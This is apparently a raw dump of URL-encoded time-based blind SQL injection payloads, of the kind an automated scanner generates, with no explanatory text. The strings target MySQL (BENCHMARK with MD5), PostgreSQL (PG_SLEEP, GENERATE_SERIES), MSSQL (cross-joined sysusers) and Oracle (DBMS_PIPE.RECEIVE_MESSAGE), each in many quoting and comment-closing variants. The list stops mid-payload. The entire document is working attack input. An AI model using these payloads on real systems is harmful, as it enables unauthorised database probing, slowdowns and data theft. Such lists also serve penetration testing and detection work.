-5532%22%29%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%28%22fHFe%22%3D%22fHFe -3452%22%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%22CRme%22%3D%22CRme -9875%22%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%22taDg%22%20LIKE%20%22taDg -7550%22%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%22tevF%22%20LIKE%20%22tevF -6456%22%29%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%28%22pIYc%22%20LIKE%20%22pIYc -2899%22%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%22lFUq%22%20LIKE%20%22lFUq -2683%25%27%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%27%25%27%3D%27 -5232%25%27%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%27%25%27%3D%27 -5551%25%27%29%29%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%28%28%27%25%27%3D%27 -3325%25%27%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%27%25%27%3D%27 -8525%00%27%29%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%28%27AgQy%27%3D%27AgQy -1107%00%27%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20AND%20%27LdsM%27%3D%27LdsM -2502%27%29%20WHERE%206918%3D6918%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20--%20 -4473%22%29%20WHERE%206493%3D6493%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20--%20 -8567%27%20WHERE%204819%3D4819%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20--%20 -4670%22%20WHERE%206715%3D6715%20OR%201286%3DBENCHMARK%285000000%2CMD5%280x724c5763%29%29%20--%20 -5139%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29 -7067%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%287363%3D7363 -9628%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%281987%3D1987 -2559%29%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%281078%3D1078 -8214%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29 -2803%29%20WHERE%208703%3D8703%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20--%20 -8588%20WHERE%204458%3D4458%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20--%20 -2133%27%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29 -8386%27%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29 -2273%22%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29 -9378%27%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27fZUu%27%3D%27fZUu -8333%27%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27yPVy%27%3D%27yPVy -8722%27%29%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27SVeN%27%3D%27SVeN -3978%27%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%27LWPT%27%3D%27LWPT -8574%27%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27zLPr%27%20LIKE%20%27zLPr -7515%27%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27LHhi%27%20LIKE%20%27LHhi -1308%27%29%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27ixSn%27%20LIKE%20%27ixSn -8142%27%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%27cuhH%27%20LIKE%20%27cuhH -7917%22%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22dODD%22%3D%22dODD -1606%22%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22GhrL%22%3D%22GhrL -9421%22%29%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22HMoh%22%3D%22HMoh -6392%22%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%22wkgo%22%3D%22wkgo -9064%22%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22oqKX%22%20LIKE%20%22oqKX -4566%22%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22lgaF%22%20LIKE%20%22lgaF -2078%22%29%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22ZAnW%22%20LIKE%20%22ZAnW -6595%22%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%22jEsb%22%20LIKE%20%22jEsb -7214%25%27%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27%25%27%3D%27 -8009%25%27%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27%25%27%3D%27 -4373%25%27%29%29%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27%25%27%3D%27 -2057%25%27%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%27%25%27%3D%27 -2276%00%27%29%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27tWUf%27%3D%27tWUf -3504%00%27%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20AND%20%27wYSC%27%3D%27wYSC -7112%27%29%20WHERE%205219%3D5219%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20--%20 -8338%22%29%20WHERE%201780%3D1780%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20--%20 -1737%27%20WHERE%208185%3D8185%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20--%20 -4080%22%20WHERE%202731%3D2731%20OR%205392%3D%28SELECT%205392%20FROM%20PG_SLEEP%285%29%29%20--%20 -2700%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -3325%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%283712%3D3712 -8451%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%287852%3D7852 -9660%29%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%286000%3D6000 -8105%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -8086%29%20WHERE%204748%3D4748%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -8608%20WHERE%208046%3D8046%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -6453%27%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -5245%27%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -5032%22%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -7235%27%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27zZIl%27%3D%27zZIl -6066%27%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27uGSg%27%3D%27uGSg -5478%27%29%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27RQzO%27%3D%27RQzO -6680%27%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27TPyW%27%3D%27TPyW -4801%27%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27gsOR%27%20LIKE%20%27gsOR -2315%27%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27ClNi%27%20LIKE%20%27ClNi -1636%27%29%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27qyJB%27%20LIKE%20%27qyJB -7192%27%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27REvY%27%20LIKE%20%27REvY -7501%22%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22lTYB%22%3D%22lTYB -7891%22%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22OpCV%22%3D%22OpCV -9935%22%29%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22dWEw%22%3D%22dWEw -8494%22%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22DXXd%22%3D%22DXXd -8113%22%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%22uUxM%22%20LIKE%20%22uUxM -5718%22%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%22XHej%22%20LIKE%20%22XHej -9068%22%29%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%22cMXc%22%20LIKE%20%22cMXc -9225%22%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%22oLEe%22%20LIKE%20%22oLEe -3628%25%27%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27%25%27%3D%27 -3060%25%27%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27%25%27%3D%27 -7676%25%27%29%29%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27%25%27%3D%27 -1383%25%27%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27%25%27%3D%27 -1524%00%27%29%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27COaO%27%3D%27COaO -6999%00%27%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27kdUb%27%3D%27kdUb -6962%27%29%20WHERE%209742%3D9742%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -5748%22%29%20WHERE%209406%3D9406%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -2236%27%20WHERE%204530%3D4530%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -1498%22%20WHERE%209325%3D9325%20OR%202870%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20--%20 -9126%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -3426%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%284162%3D4162 -3433%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%287285%3D7285 -8636%29%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%282711%3D2711 -5162%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -2878%29%20WHERE%204288%3D4288%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -3839%20WHERE%209726%3D9726%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -9415%27%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -7894%27%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -9921%22%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 -5577%27%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27ZLYY%27%3D%27ZLYY -9271%27%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27STpp%27%3D%27STpp -6110%27%29%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27QdQr%27%3D%27QdQr -7920%27%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27mIuZ%27%3D%27mIuZ -6004%27%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27NxOw%27%20LIKE%20%27NxOw -6627%27%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27flms%27%20LIKE%20%27flms -9829%27%29%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27niWw%27%20LIKE%20%27niWw -6022%27%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27BChG%27%20LIKE%20%27BChG -8979%22%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22icQh%22%3D%22icQh -7262%22%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22regl%22%3D%22regl -2314%22%29%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22JVni%22%3D%22JVni -6973%22%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22PaWP%22%3D%22PaWP -7933%22%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22DKAT%22%20LIKE%20%22DKAT -6482%22%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22VIas%22%20LIKE%20%22VIas -6370%22%29%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22KSdc%22%20LIKE%20%22KSdc -9214%22%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22TvHM%22%20LIKE%20%22TvHM -7837%25%27%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27%25%27%3D%27 -2715%25%27%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27%25%27%3D%27 -5063%25%27%29%29%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27%25%27%3D%27 -2144%25%27%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27%25%27%3D%27 -1074%00%27%29%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27CHrm%27%3D%27CHrm -1688%00%27%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27WTgo%27%3D%27WTgo -6589%27%29%20WHERE%208735%3D8735%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -9623%22%29%20WHERE%201949%3D1949%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -7358%27%20WHERE%206855%3D6855%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -6569%22%20WHERE%202190%3D2190%20OR%205836%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20--%20 -9041%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29 -3207%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%286328%3D6328 -5409%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%281986%3D1986 -9872%29%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%288982%3D8982 -3539%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29 -9706%29%20WHERE%203352%3D3352%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20--%20 -9035%20WHERE%204618%3D4618%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20--%20 -2201%27%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29 -8603%27%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29 -4094%22%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29 -5354%27%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%27SxJX%27%3D%27SxJX -7012%27%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%27QSYb%27%3D%27QSYb -1634%27%29%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%28%27KGRj%27%3D%27KGRj -3291%27%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%27Efws%27%3D%27Efws -2691%27%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%27VbUp%27%20LIKE%20%27VbUp -5613%27%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%27HccP%27%20LIKE%20%27HccP -1915%27%29%29%29%20OR%208916%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%28120%29%7C%7CCHR%28100%29%2C5%29%20AND%20%28%28%28%27sFTF%27%20LIKE%20%27sFTF 